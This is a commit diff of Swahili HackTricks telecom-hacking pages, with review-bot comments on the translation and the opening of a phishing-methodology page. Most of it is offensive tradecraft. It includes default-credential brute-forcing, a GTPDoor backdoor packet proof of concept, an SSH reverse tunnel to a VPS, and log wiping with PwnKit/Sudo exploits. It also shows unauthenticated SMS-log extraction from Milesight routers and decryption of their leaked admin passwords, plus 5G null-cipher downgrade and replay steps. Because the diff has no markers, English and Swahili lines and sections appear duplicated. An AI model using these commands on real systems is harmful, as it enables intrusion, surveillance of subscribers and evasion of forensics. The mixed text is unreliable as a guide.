Translated ['', 'src/generic-methodologies-and-resources/phishing-method

This commit is contained in:
Translator 2025-10-09 00:51:37 +00:00
parent b25d4663a6
commit 269b5f65de
2 changed files with 347 additions and 245 deletions

View File

@ -1,27 +1,27 @@
# Telecom Network Exploitation (GTP / Roaming Environments)
# Utumiaji Mabaya wa Mtandao wa Telecom (GTP / Mazingira ya Roaming)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Itifaki za core za simu (GPRS Tunnelling Protocol GTP) mara nyingi hupitia semi-trusted GRX/IPX roaming backbones. Kwa kuwa zinaendeshwa juu ya plain UDP na karibu bila uthibitishaji, **ufikiaji wowote ndani ya mipaka ya telecom mara nyingi unaweza kufikia moja kwa moja signalling planes za core**. Maelezo yafuatayo yanakusanya mbinu za kushambulia zilizoonekana katika mazingira ya vitani dhidi ya SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
> Itifaki za core za simu (GPRS Tunnelling Protocol GTP) mara nyingi huvuka backbones za roaming za GRX/IPX ambazo hazijo kabisa kuaminika. Kwa kuwa zinabebwa juu ya UDP plain bila karibu uthibitisho wowote, **foothold yoyote ndani ya mpaka la telecom kwa kawaida inaweza kufikia core signalling planes moja kwa moja**. Vidokezo vifuatavyo vinakusanya mbinu za kushambulia zilizoshuhudiwa kwa SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
## 1. Recon & Initial Access
### 1.1 Default OSS / NE Accounts
Seti kubwa kwa kushangaza ya elementi za mtandao kutoka kwa wauzaji huja na watumiaji waliowekwa imara wa SSH/Telnet kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … wordlist maalum huongeza kwa kiasi kikubwa mafanikio ya brute-force:
Seti kubwa kwa kushangaza ya vipengele vya mtandao vya vendor huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … wordlist maalum inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
Ikiwa kifaa kinaonyesha tu management VRF, pivot kupitia jump host kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
Ikiwa kifaa kinatoa tu VRF ya usimamizi, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).
### 1.2 Ugundaji wa Host ndani ya GRX/IPX
Wengi wa operatori wa GRX bado wanaruhusu **ICMP echo** kupita kwenye backbone. Changanya `masscan` na probes za UDP zilizojengwa `gtpv1` ili kwa haraka ramani ya GTP-C listeners:
### 1.2 Host Discovery ndani ya GRX/IPX
Waendeshaji wengi wa GRX bado wanaruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na `gtpv1` UDP probes zilizojengwa ndani ili kuunda ramani kwa haraka ya GTP-C listeners:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Kuorodhesha Abonati `cordscan`
## 2. Kuorodhesha Wateja `cordscan`
Chombo cha Go kilicho hapa kinatengeneza vifurushi vya **GTP-C Create PDP Context Request** na kurekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na abonati.
Chombo cha Go kilicho hapa kinaunda vifurushi vya **GTP-C Create PDP Context Request** na kinaweka kumbukumbu za majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
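Review bot: The new intro sentence ("Itifaki za core za simu … mpaka la telecom") has two grammar problems that make it read worse than the line it replaces: `hazijo kabisa kuaminika` is not a Swahili word form (the source idea is "semi-trusted", which would be `zinazoaminika kwa kiasi tu`), and `mpaka la telecom` needs class agreement, `mpaka wa telecom`. Note also that the rendered hunk carries no `+`/`-` markers, so which of each adjacent English/Swahili pair (e.g. `# Telecom Network Exploitation …` next to `# Utumiaji Mabaya wa Mtandao wa Telecom …`) survives can only be inferred from position; please confirm the Swahili title is the one kept.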
@ -30,21 +30,21 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Bendera muhimu:
- `--imsi` IMSI ya mteja lengwa
- `--imsi` IMSI ya mteja anayelengwa
- `--oper` Home / HNI (MCC+MNC)
- `-w` Andika paketi ghafi kwenye pcap
- `-w` Andika vifurushi mbichi kwenye pcap
Konstanti muhimu ndani ya binary zinaweza kubadilishwa ili kupanua skani:
Konstanti muhimu ndani ya binary zinaweza kupachikwa ili kupanua scans:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Utekelezaji wa Msimbo kupitia GTP `GTPDoor`
## 3. Utekelezaji wa Msimbo juu ya GTP `GTPDoor`
`GTPDoor` ni huduma ndogo ya ELF ambayo **binds UDP 2123 and parses every incoming GTP-C packet**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr hu-exfiltrate ndani ya ujumbe za **Echo Response** ili hakuna outward session kamwe isiundwe.
`GTPDoor` ni huduma ndogo ya ELF ambayo inasikiliza kwenye UDP 2123 na inachambua kila GTP-C packet inayokuja. Wakati payload inaanza na tag iliyoshirikiwa awali, sehemu iliyosalia inafumbuliwa (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya ujumbe za **Echo Response** ili hakuna session ya nje itakayoundwa.
Minimal PoC packet (Python):
Paketi ya PoC ndogo (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
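Review bot: `Konstanti muhimu ndani ya binary zinaweza kupachikwa ili kupanua scans` is a regression: `kupachikwa` means "to be hung up / attached", while the replaced wording `kubadilishwa` correctly conveyed that the constants can be patched. Suggest `zinaweza kubadilishwa (patched)`. In the GTPDoor paragraph, `stdout/stderr zinexfiltrated` is a half-English hybrid; `stdout/stderr zinatolewa nje (exfiltrated)` keeps the term and reads as Swahili.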
@ -52,40 +52,40 @@ cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Ugunduzi:
* yoyote mwenyeji anayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
Detection:
* mashine yoyote inayotuma **unbalanced Echo Requests** kwa IP za SGSN
* bendera ya toleo la GTP imewekwa kwa 1 wakati aina ya ujumbe = 1 (Echo) utofauti na spec
## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` inakuja na emulator ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Baada ya kukubaliana, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
`OsmoGGSN` inaambatisha emulator ya SGSN inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara mazungumzo yanapokamilika, Linux inapokea kiolesura kipya `tun0` kinachoweza kufikiwa kutoka kwa mwenza wa roaming.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
```
Kwa hair-pinning sahihi ya firewall, tundu hili linapita kando ya signalling-only VLANs na linakupeleka moja kwa moja kwenye **safu ya data**.
Kwa firewall hair-pinning inayofaa, tuneli hii inapita kando ya signalling-only VLANs na inakupeleka moja kwa moja kwenye **data plane**.
### 4.2 SSH Reverse Tunnel over Port 53
DNS huwa wazi karibu kila mara katika miundombinu za roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako ikisikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
DNS karibu kila mara huwa wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako inayosikiliza kwenye :53 kisha rudi baadaye kutoka nyumbani:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
Thibitisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
## 5. Covert Channels
## 5. Njia za siri
| Channel | Transport | Decoding | Notes |
| Chaneli | Usafirishaji | Ufasiri | Maelezo |
|---------|-----------|----------|-------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimyakimya kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inaingiliana na mazungumzo halali ya GTP-C chatter |
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimya kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | huangalia sub-domain `*.nodep` |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inajumuika na mazungumzo halali ya GTP-C chatter |
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
Implants zote zinaweka watchdogs ambazo **timestomp** binaries zao na re-spawn ikiwa zimeanguka.
## 6. Defense Evasion Cheatsheet
## 6. Muhtasari wa Kuepukana na Ulinzi
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
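Review bot: `OsmoGGSN inaambatisha emulator ya SGSN` says OsmoGGSN "attaches" an SGSN emulator; the replaced line `inakuja na` ("ships with") was the accurate rendering and should be kept. In the covert-channel table header, `Ufasiri` means "interpretation"; `Usimbuaji` is the usual term for "Decoding" and matches the XOR/AES content of that column. The heading `## 5. Njia za siri` is the only one in the file without title-case on the second word, so `## 5. Njia za Siri` for consistency with the other headings.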
@ -111,79 +111,79 @@ python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py
```
Dokezo la kusafisha:
Ushauri wa usafishaji:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Zana
## 8. Tool Box
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` custom tooling described in previous sections.
* `FScan` : msako wa TCP kwenye intranet (`fscan -p 22,80,443 10.0.0.0/24`)
* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5
* `FRP` (≥0.37) : traversal ya NAT / kuunganisha asset
* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
* `FRP` (≥0.37) : NAT traversal / asset bridging
## 9. Mashambulizi ya Usajili wa 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
Mchakato wa usajili wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa wala hazijafichwa. Dirisha hili kabla ya usalama huruhusu njia mbalimbali za mashambulizi wakati unaweza kuangalia au kuharibu trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
Mchakato wa registration wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS hauwashwi kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa na hazijaencrypt. Dirisha hili la kabla ya usalama linawezesha njia nyingi za attack wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mfano, on-path ndani ya core, rogue gNB, au testbed).
Mtiririko wa usajili (imefupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyofichwa) na capabilities.
- Authentication: AMF/AUSF inatuma RAND/AUTN; UE inarejesha RES*.
- Security Mode Command/Complete: NAS integrity na ciphering vinajadiliwa na kuanzishwa.
- PDU Session Establishment: usanidi wa IP/QoS.
Registration flow (simplified):
- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa na home-network public key) na capabilities.
- Authentication: AMF/AUSF wanatuma RAND/AUTN; UE inarejesha RES*.
- Security Mode Command/Complete: integrity na ciphering za NAS zinajadiliwa na kuanzishwa.
- PDU Session Establishment: setup ya IP/QoS.
Vidokezo vya usanidi wa maabara (si-RF):
- Core: Open5GS default deployment inatosha kuzalisha mtiririko.
- UE: simulator au UE ya majaribio; decode kwa kutumia Wireshark.
Lab setup tips (non-RF):
- Core: Open5GS default deployment inatosha kuzalisha flows.
- UE: simulator au test UE; decode kwa kutumia Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Filters muhimu za kuonyesha katika Wireshark:
- Useful display filters in Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
### 9.1 Faragha ya kitambulisho: SUCI failures exposing SUPI/IMSI
Inatarajiwa: UE/USIM lazima itume SUCI (SUPI iliyofichwa kwa funguo za umma za mtandao wa nyumbani). Kupata SUPI/IMSI wazi ndani ya Registration Request inaonyesha dosari ya faragha inayowezesha kufuatilia mteja kwa muda mrefu.
### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI
Inayotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa na home-network public key). Kupata SUPI/IMSI kwa plaintext ndani ya Registration Request kunaonyesha hitilafu ya privacy inayoruhusu tracking ya subscriber kwa muda mrefu.
Jinsi ya kujaribu:
- Kamata ujumbe wa kwanza wa NAS katika InitialUEMessage na chunguza Mobile Identity IE.
- Ukaguzi wa haraka kwenye Wireshark:
- Inapaswa ku-decode kama SUCI, sio IMSI.
- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na uwepo wa `imsi` kunaonyesha kuvuja.
- Capture ujumbe wa kwanza wa NAS katika InitialUEMessage na inspect Mobile Identity IE.
- Wireshark quick checks:
- Inapaswa kudecode kama SUCI, sio IMSI.
- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should exist; absence plus presence of `imsi` indicates leakage.
Nini kukusanya:
- MCC/MNC/MSIN ikiwa imetolewa; rejea kwa kila-UE na fuatilia kwa muda/mahali.
Kitu cha kukusanya:
- MCC/MNC/MSIN ikiwa imefunuliwa; log kwa kila-UE na track kwa wakati/mahali.
Kupunguza:
- Lazimisha UEs/USIMs zenye SUCI pekee; toa tahadhari juu ya IMSI/SUPI yoyote katika NAS ya mwanzo.
Mitigation:
- Lete enforcement ya SUCI-only UEs/USIMs; toa alert juu ya IMSI/SUPI yoyote katika initial NAS.
### 9.2 Kupunguza uwezo (capability bidding-down) hadi algoritmu tupu (EEA0/EIA0)
Mandhari:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotunukiwa katika UE Security Capability IE ya Registration Request.
- Ramani za kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algoritmu tupu (null).
### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)
Background:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotambuliwa katika UE Security Capability IE ya Registration Request.
- Common mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni null algorithms.
Tatizo:
- Kwa sababu Registration Request haijalindwa kwa integriti, mshambuliaji aliye on-path anaweza kufuta bits za capability ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks kwa makosa huruhusu algoritmu tupu nje ya huduma za dharura.
Issue:
- Kwa sababu Registration Request haina integrity protection, on-path attacker anaweza kufuta capability bits ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks zinakubali vibaya null algorithms hata nje ya huduma za dharura.
Hatua za kushambulia:
- Intercept InitialUEMessage na badilisha NAS UE Security Capability ili kutangaza tu EEA0/EIA0.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kuendelea.
Offensive steps:
- Intercept InitialUEMessage na modify NAS UE Security Capability ili itangaze tu EEA0/EIA0.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch capability bits kabla ya kuendelea mbele.
- Angalia kama AMF inakubali null ciphers/integrity na inakamilisha Security Mode kwa EEA0/EIA0.
Uhakiki/uwazi:
- Katika Wireshark, thibitisha algoritmu zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa output ya passive sniffer:
Verification/visibility:
- Katika Wireshark, thibitisha algorithms zilizochaguliwa baada ya Security Mode Command/Complete.
- Example passive sniffer output:
```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```
Mikakati (zinazohitajika):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale inapotakiwa kwa lazima (kwa mfano, simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 kama kiwango cha chini; rekodi na toa alarm kwa muktadha wowote wa usalama wa NAS unaojadiliana kuhusu null algorithms.
Marekebisho (yanayohitajika):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale panapobidiwa kwa ukali (kwa mfano, simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa tahadhari kwa muktadha wowote wa usalama wa NAS unaojadiliana null algorithms.
### 9.3 Replay ya initial Registration Request (pre-security NAS)
Kwa sababu initial NAS haina uadilifu na freshness, InitialUEMessage+Registration Request iliyokamatwa inaweza kureplayed kwa AMF.
### 9.3 Replay of initial Registration Request (pre-security NAS)
Kwa sababu NAS ya awali haina uadilifu na freshness, InitialUEMessage+Registration Request zilizokamatwa zinaweza ku-replay kwa AMF.
PoC rule for 5GReplay to forward matching replays:
```xml
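Review bot: Section 9 in this hunk pairs almost every Swahili line with an English twin (`## 9. Mashambulizi ya Usajili wa 5G NAS …` beside `## 9. 5G NAS Registration Attacks …`, `Mtiririko wa usajili (imefupishwa):` beside `Registration flow (simplified):`, `Hatua za kushambulia:` beside `Offensive steps:`), and the same happens for `## 8. Zana` / `## 8. Tool Box` and the tool bullets under it; without diff markers it is not possible to tell which copy is kept, so please confirm the Swahili lines are the surviving ones rather than the English ones being reintroduced. Separately, `Hadi usalama wa NAS hauwashwi kwa Security Mode Command/Complete` is a double negative ("until NAS security is not enabled"); the replaced `Hadi usalama wa NAS uanzishwe` was correct. The `Encyrption` spelling inside the sniffer output block is quoted tool output and should stay untouched.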
@ -208,34 +208,105 @@ boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
```
Kitu cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa uhalisia au wa muktadha unaonyesha hatari.
What to observe:
- Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa freshness au binding ya muktadha unaashiria udhaifu.
Marekebisho:
- Lazimisha replay protection/context binding kwenye AMF; rate-limit na correlate kwa kila GNB/UE.
Mitigations:
- Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.
- Tekeleza ulinzi dhidi ya replay na binding ya muktadha kwenye AMF; weka rate-limiting na uoanishaji kwa kila GNB/UE.
### 9.4 Vidokezo vya zana (inayoweza kurudiwa)
- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
- Wireshark: thibitisha ufasiri wa NGAP/NAS; tumia filters zilizo juu ili kutenganisha Registration.
- 5GReplay: rekodi registration, kisha replay ujumbe maalum za NGAP + NAS kama sheria inavyoeleza.
- Sni5Gect: sniff/modify/inject NAS control-plane kwa moja kwa moja ili kulazimisha null algorithms au kuingilia authentication sequences.
### 9.4 Tooling pointers (reproducible)
- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
- Open5GS: anzisha AMF/SMF/UPF ili kughushi core; angalia N2 (NGAP) na NAS.
- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
- Wireshark: thibitisha decodes za NGAP/NAS; tumia vichujio vilivyo hapo juu kutenganisha Registration.
- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
- 5GReplay: rekodi Registration, kisha replay ujumbe maalum za NGAP + NAS kama ilivyoelezwa.
- Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.
- Sni5Gect: sniff/modify/inject kwa wakati halisi kwenye NAS control-plane ili kulazimisha null algorithms au kuyumbisha mfululizo wa authentication.
### 9.5 Orodha ya ulinzi
- Endelea kuchunguza Registration Request kwa plaintext SUPI/IMSI; zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizobainishwa kwa ukomo; hitaji angalau EEA2/EIA2.
- Gundua miundombinu haribifu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara ya InitialUEMessage.
### 9.5 Defensive checklist
- Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
- Endelea kukagua Registration Request kwa SUPI/IMSI za plain text; zuia vifaa/USIMs vinavyokiuka.
- Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizoainishwa kwa undani mdogo; hitaji angalau EEA2/EIA2.
- Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
- Tambua miundombinu ya rogue au iliyosanidiwa vibaya: gNB/AMF zisizoidhinishwa, N2 peers zisizotarajiwa.
- Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
- Toa onyo kwa NAS security modes zinazosababisha null algorithms au replay za mara kwa mara za InitialUEMessage.
---
## Mawazo ya Ugunduzi
1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**.
2. **Porti zisizo za kawaida (53, 80, 443) zinapokea SSH handshakes** kutoka IP za ndani.
3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** inaweza kuonyesha GTPDoor beacons.
4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply iliyo na uwanja mkubwa wa identifier/sequence usio sifuri**.
5. 5G: **InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka vituo sawa** (ishara ya replay).
6. 5G: **NAS Security Mode inayojadili EEA0/EIA0** nje ya muktadha wa dharura.
## Marejeo
## 10. Industrial Cellular Routers Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPCstyle endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
- Matumizi mabaya ya web APIs zilizo wazi za routers za cellular za viwandani yanawezesha smishing ya chanzo cha carrier kwa siri na kwa wingi. Routers za mfululizo wa Milesight UR zinaonyesha endpoint ya mtindo wa JSON-RPC kwenye `/cgi`. Wakati zinaposanidiwa vibaya, API inaweza kuhojiwa bila uthibitisho ili kuorodhesha SMS inbox/outbox na, katika baadhi ya usanidi, kutuma SMS.
Typical unauthenticated requests (same structure for inbox/outbox):
- Maombi ya kawaida yasiyo na uthibitisho (muundo ule ule kwa inbox/outbox):
```http
POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json
{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
```
```json
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
```
Majibu yanajumuisha mashamba kama `timestamp`, `content`, `phone_number` (E.164), na `status` (`success` or `failed`). Kutumwa kwa `failed` mara kwa mara kwa nambari ile ile mara nyingi ni attacker “capability checks” ili kuthibitisha kuwa router/SIM inaweza kuwasilisha kabla ya blasting.
Mfano wa curl ku-exfiltrate SMS metadata:
```bash
curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
```
Vidokezo kuhusu auth artifacts:
- Baadhi ya trafiki inaweza kujumuisha auth cookie, lakini sehemu kubwa ya vifaa vilivyo wazi huwajibu bila authentication kwa `query_inbox`/`query_outbox` wakati management interface iko Internet-facing.
- Kwenye mazingira yanayohitaji auth, previously-leaked credentials (tazama chini) hurudisha access.
Credential recovery path CVE-2023-43261:
- Familia zilizoathiriwa: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
- Tatizo: web-served logs (e.g., `httpd.log`) zinapatikana unauthenticated chini ya `/lang/log/` na zina admin login events zenye password iliyo encrypted kwa kutumia hardcoded AES key/IV iliyopo client-side JavaScript.
- Practical access and decrypt:
```bash
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}
```
Mfano mdogo wa Python kwa decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
```python
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...' # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
```
Mawazo ya kuwinda na kugundua (mtandao):
- Toa onyo kwa `POST /cgi` zisizothibitishwa ambazo mwili wa JSON una `base`/`function` umewekwa kuwa `query_inbox` au `query_outbox`.
- Fuata milipuko ya `POST /cgi` zinazojirudia zikifuatiwa na vigezo `status":"failed"` kwenye nambari nyingi za kipekee kutoka IP moja ya chanzo (capability testing).
- Fanya inventari ya Milesight routers zinazoweza kupatikana kutoka Internet; zuia usimamizi kwa VPN; zima vipengele vya SMS isipohitajika; sasisha hadi ≥ v35.3.0.7; rotate credentials na kagua SMS logs kwa unknown sends.
Shodan/OSINT pivots (mifano yaliyoshuhudiwa porini):
- `http.html:"rt_title"` inafanana na paneli za Milesight router.
- Google dorking kwa exposed logs: `"/lang/log/system" ext:log`.
Athari za kiutendaji: kutumia SIM halali za carrier ndani ya router kunatoa SMS deliverability/credibility ya juu sana kwa phishing, wakati inbox/outbox exposure leaks sensitive metadata at scale.
---
## Mawazo ya Ugunduzi
1. **Kifaa chochote isipokuwa SGSN/GGSN kinachoitisha Create PDP Context Requests**.
2. **Ports zisizo za kawaida (53, 80, 443) zikipokea SSH handshakes** kutoka IP za ndani.
3. **Echo Requests mara nyingi bila Echo Responses zinazolingana** inaweza kuashiria GTPDoor beacons.
4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence kubwa, zisizo sifuri**.
5. 5G: **InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka endpoints sawa** (replay signal).
6. 5G: **NAS Security Mode ikijadili EEA0/EIA0** nje ya muktadha wa dharura.
## References
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
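Review bot: The `## Mawazo ya Ugunduzi` block now appears twice in this hunk, once before `## Marejeo` and again, with the six items reworded, before `## References`; only one copy should remain, and the references heading should be in one language, not `Marejeo` in one place and `References` in the other. In the new section 10, the two Swahili intro paragraphs gain a leading `- ` that turns them into bullet items while their English counterparts are plain paragraphs; drop the dashes. Two wording errors in the same section: `mashamba` means literal farms, so `Majibu yanajumuisha sehemu (fields) kama timestamp …`, and `zuia usimamizi kwa VPN` means "block management via VPN" where the intent is "restrict management to the VPN", i.e. `weka usimamizi ndani ya VPN pekee`.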
@ -243,5 +314,8 @@ Marekebisho:
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
- 3GPP TS 24.501 Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 Security architecture and procedures for 5G System
- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
- [CVE-2023-43261 NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,43 +1,43 @@
# Mbinu za Phishing
# Phishing Methodology
{{#include ../../banners/hacktricks-training.md}}
## Mbinu
1. Fanya recon kwa victim
1. Chagua the **victim domain**.
2. Fanya web enumeration ya msingi ukitafuta **login portals** zinazotumika na victim na **amua** ni ipi utakayo **impersonate**.
3. Tumia **OSINT** ili **find emails**.
2. Andaa mazingira
1. **Buy the domain** utakaotumia kwa phishing assessment
1. Recon the victim
1. Select the **victim domain**.
2. Perform some basic web enumeration **searching for login portals** used by the victim and **decide** which one you will **impersonate**.
3. Use some **OSINT** to **find emails**.
2. Prepare the environment
